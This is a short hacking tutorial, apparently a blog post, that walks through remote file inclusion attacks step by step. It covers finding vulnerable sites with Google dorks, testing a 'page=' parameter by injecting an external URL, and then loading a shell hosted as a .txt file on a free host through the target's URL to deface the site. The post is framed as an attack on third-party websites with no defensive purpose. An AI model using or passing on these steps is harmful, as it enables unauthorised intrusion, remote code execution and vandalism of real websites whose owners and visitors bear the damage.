Hello again,today I'm going to show you how RFI process goes Step By Step
#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them
Searching for Vuln. sites:
We can find Vuln.websites by using Google DorkS
Checking if they are Vuln. :
Now after we searched for sites on google, many sites will show but not all of them are Vuln.
so how can we check?
after opening the site check the link, for example it will be like:
http://www.tagert.com/index.php?page=ANYTHING
now to check the site we should replace "ANYTHING" with "http://www.google.com"
so it will be like :
http://www.tagert.com/index.php?page=htt...google.com
IF google home page showed up then the website is Vuln. for RFI,
IF not then fine another one
Defacing:
OK, now if we found a Vuln. website how to deface? o_O
well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAPMLE it will be:
http://www.yourfreehost.com/shell.txt
http://www.tagert.com/index.php?page=htt...shell.txt?
[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL
Now your shell will show
Now deface the site and enjoy
Post a Comment